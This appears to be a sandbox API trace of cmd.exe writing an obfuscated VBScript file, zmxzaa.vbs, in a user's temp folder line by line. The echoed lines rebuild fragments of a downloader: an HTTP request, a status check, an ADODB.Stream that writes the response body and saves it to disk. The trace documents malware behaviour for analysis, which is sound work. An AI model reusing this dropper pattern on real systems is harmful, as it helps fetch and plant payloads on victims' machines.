[0077.868] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x22f23c, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f23c*=0x60, lpOverlapped=0x0) returned 1
[0077.869] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.869] _close (_FileHandle=3) returned 0
[0077.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.870] GetFileType (hFile=0x7) returned 0x2
[0077.870] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.870] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f3c4 | out: lpMode=0x22f3c4) returned 1
[0077.870] _dup (_FileHandle=1) returned 3
[0077.871] _close (_FileHandle=1) returned 0
[0077.871] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.871] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f394, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.871] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.871] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.871] GetFileType (hFile=0x1c) returned 0x1
[0077.871] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24c
[0077.871] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f3ac*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f3ac*=0) returned 0x24b
[0077.871] ReadFile (in: hFile=0x1c, lpBuffer=0x22f3a4, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f3a0, lpOverlapped=0x0 | out: lpBuffer=0x22f3a4*, lpNumberOfBytesRead=0x22f3a0*=0x1, lpOverlapped=0x0) returned 1
[0077.872] GetConsoleTitleW (in: lpConsoleTitle=0x22f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.872] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f18c | out: _Buffer="B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\n") returned 41
[0077.872] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.872] GetFileType (hFile=0x1c) returned 0x1
[0077.872] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\n", lpUsedDefaultChar=0x0) returned 42
[0077.872] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x22f178, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f178*=0x29, lpOverlapped=0x0) returned 1
[0077.872] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.873] _close (_FileHandle=3) returned 0
[0077.874] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.874] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.874] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.874] GetFileType (hFile=0x7) returned 0x2
[0077.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f300 | out: lpMode=0x22f300) returned 1
[0077.874] _dup (_FileHandle=1) returned 3
[0077.875] _close (_FileHandle=1) returned 0
[0077.875] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.875] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f2d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.875] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.875] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.875] GetFileType (hFile=0x1c) returned 0x1
[0077.875] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x275
[0077.875] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f2e8*=0) returned 0x274
[0077.876] ReadFile (in: hFile=0x1c, lpBuffer=0x22f2e0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f2dc, lpOverlapped=0x0 | out: lpBuffer=0x22f2e0*, lpNumberOfBytesRead=0x22f2dc*=0x1, lpOverlapped=0x0) returned 1
[0077.876] GetConsoleTitleW (in: lpConsoleTitle=0x22f100, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.876] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f0c8 | out: _Buffer="If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\n") returned 52
[0077.876] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.876] GetFileType (hFile=0x1c) returned 0x1
[0077.876] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.876] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\n", lpUsedDefaultChar=0x0) returned 53
[0077.876] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x22f0b4, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f0b4*=0x34, lpOverlapped=0x0) returned 1
[0077.876] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.877] _close (_FileHandle=3) returned 0
[0077.878] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.878] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.878] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.878] GetFileType (hFile=0x7) returned 0x2
[0077.878] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.878] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f23c | out: lpMode=0x22f23c) returned 1
[0077.878] _dup (_FileHandle=1) returned 3
[0077.879] _close (_FileHandle=1) returned 0
[0077.879] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.879] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f20c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.879] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.879] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.879] GetFileType (hFile=0x1c) returned 0x1
[0077.879] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a9
[0077.879] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f224*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f224*=0) returned 0x2a8
[0077.879] ReadFile (in: hFile=0x1c, lpBuffer=0x22f21c, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f218, lpOverlapped=0x0 | out: lpBuffer=0x22f21c*, lpNumberOfBytesRead=0x22f218*=0x1, lpOverlapped=0x0) returned 1
[0077.879] GetConsoleTitleW (in: lpConsoleTitle=0x22f03c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.880] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f004 | out: _Buffer="Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\n") returned 99
[0077.880] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.880] GetFileType (hFile=0x1c) returned 0x1
[0077.880] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.880] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\n", lpUsedDefaultChar=0x0) returned 100
[0077.880] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x22eff0, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22eff0*=0x63, lpOverlapped=0x0) returned 1
[0077.880] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.881] _close (_FileHandle=3) returned 0
[0077.882] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.882] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.882] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.882] GetFileType (hFile=0x7) returned 0x2
[0077.882] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.882] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f178 | out: lpMode=0x22f178) returned 1
[0077.882] _dup (_FileHandle=1) returned 3
[0077.883] _close (_FileHandle=1) returned 0
[0077.883] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.883] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f148, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.883] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.883] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.883] GetFileType (hFile=0x1c) returned 0x1
[0077.883] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30c
[0077.883] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f160*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f160*=0) returned 0x30b
[0077.883] ReadFile (in: hFile=0x1c, lpBuffer=0x22f158, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f154, lpOverlapped=0x0 | out: lpBuffer=0x22f158*, lpNumberOfBytesRead=0x22f154*=0x1, lpOverlapped=0x0) returned 1
[0077.883] GetConsoleTitleW (in: lpConsoleTitle=0x22ef78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.884] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22ef40 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\n") returned 69
[0077.884] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.884] GetFileType (hFile=0x1c) returned 0x1
[0077.884] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.884] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\n", lpUsedDefaultChar=0x0) returned 70
[0077.884] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x22ef2c, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22ef2c*=0x45, lpOverlapped=0x0) returned 1
[0077.884] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.885] _close (_FileHandle=3) returned 0
[0077.885] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.885] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.885] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.885] GetFileType (hFile=0x7) returned 0x2
[0077.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.886] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0b4 | out: lpMode=0x22f0b4) returned 1
[0077.886] _dup (_FileHandle=1) returned 3
[0077.886] _close (_FileHandle=1) returned 0
[0077.886] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.887] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f084, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.887] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.887] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.887] GetFileType (hFile=0x1c) returned 0x1
[0077.887] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x351
[0077.887] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f09c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f09c*=0) returned 0x350
[0077.887] ReadFile (in: hFile=0x1c, lpBuffer=0x22f094, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f090, lpOverlapped=0x0 | out: lpBuffer=0x22f094*, lpNumberOfBytesRead=0x22f090*=0x1, lpOverlapped=0x0) returned 1
[0077.887] GetConsoleTitleW (in: lpConsoleTitle=0x22eeb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.888] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22ee7c | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\n") returned 73
[0077.888] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.888] GetFileType (hFile=0x1c) returned 0x1
[0077.888] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.888] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\n", lpUsedDefaultChar=0x0) returned 74
[0077.888] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x22ee68, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22ee68*=0x49, lpOverlapped=0x0) returned 1
[0077.888] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.889] _close (_FileHandle=3) returned 0
[0077.889] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.889] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.889] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.889] GetFileType (hFile=0x7) returned 0x2
[0077.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eff0 | out: lpMode=0x22eff0) returned 1
[0077.890] _dup (_FileHandle=1) returned 3
[0077.890] _close (_FileHandle=1) returned 0
[0077.891] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.891] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22efc0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.891] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.891] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.891] GetFileType (hFile=0x1c) returned 0x1
[0077.891] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39a
[0077.891] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22efd8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22efd8*=0) returned 0x399
[0077.891] ReadFile (in: hFile=0x1c, lpBuffer=0x22efd0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22efcc, lpOverlapped=0x0 | out: lpBuffer=0x22efd0*, lpNumberOfBytesRead=0x22efcc*=0x1, lpOverlapped=0x0) returned 1
[0077.891] GetConsoleTitleW (in: lpConsoleTitle=0x22edf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.891] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22edb8 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\n") returned 111
[0077.891] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.891] GetFileType (hFile=0x1c) returned 0x1
[0077.891] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.892] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\n", lpUsedDefaultChar=0x0) returned 112
[0077.892] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x22eda4, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22eda4*=0x6f, lpOverlapped=0x0) returned 1
[0077.892] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.892] _close (_FileHandle=3) returned 0
[0077.893] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.893] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.893] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.893] GetFileType (hFile=0x7) returned 0x2
[0077.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.893] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ef2c | out: lpMode=0x22ef2c) returned 1
[0077.893] _dup (_FileHandle=1) returned 3
[0077.894] _close (_FileHandle=1) returned 0
[0077.894] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.894] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22eefc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.894] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.894] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.894] GetFileType (hFile=0x1c) returned 0x1
[0077.894] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x409
[0077.894] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22ef14*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22ef14*=0) returned 0x408
[0077.895] ReadFile (in: hFile=0x1c, lpBuffer=0x22ef0c, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22ef08, lpOverlapped=0x0 | out: lpBuffer=0x22ef0c*, lpNumberOfBytesRead=0x22ef08*=0x1, lpOverlapped=0x0) returned 1
[0077.895] GetConsoleTitleW (in: lpConsoleTitle=0x22ed2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.895] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22ecf4 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\n") returned 77
[0077.895] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.895] GetFileType (hFile=0x1c) returned 0x1
[0077.895] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.895] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\n", lpUsedDefaultChar=0x0) returned 78
[0077.895] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x22ece0, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22ece0*=0x4d, lpOverlapped=0x0) returned 1
[0077.895] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.896] _close (_FileHandle=3) returned 0
[0077.896] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.896] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.897] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.897] GetFileType (hFile=0x7) returned 0x2
[0077.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.897] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ee68 | out: lpMode=0x22ee68) returned 1
[0077.897] _dup (_FileHandle=1) returned 3
[0077.897] _close (_FileHandle=1) returned 0
[0077.898] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.898] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22ee38, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.898] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.898] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.898] GetFileType (hFile=0x1c) returned 0x1
[0077.898] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x456
[0077.898] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22ee50*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22ee50*=0) returned 0x455
[0077.898] ReadFile (in: hFile=0x1c, lpBuffer=0x22ee48, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22ee44, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesRead=0x22ee44*=0x1, lpOverlapped=0x0) returned 1
[0077.898] GetConsoleTitleW (in: lpConsoleTitle=0x22ec68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.899] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22ec30 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\n") returned 115
[0077.899] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.899] GetFileType (hFile=0x1c) returned 0x1
[0077.899] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.899] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\n", lpUsedDefaultChar=0x0) returned 116
[0077.899] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x73, lpNumberOfBytesWritten=0x22ec1c, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22ec1c*=0x73, lpOverlapped=0x0) returned 1
[0077.899] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.900] _close (_FileHandle=3) returned 0
[0077.900] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.900] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.900] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.900] GetFileType (hFile=0x7) returned 0x2
[0077.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eda4 | out: lpMode=0x22eda4) returned 1
[0077.901] _dup (_FileHandle=1) returned 3
[0077.901] _close (_FileHandle=1) returned 0
[0077.901] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.901] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22ed74, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.901] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.901] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.901] GetFileType (hFile=0x1c) returned 0x1
[0077.902] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c9
[0077.902] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22ed8c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22ed8c*=0) returned 0x4c8
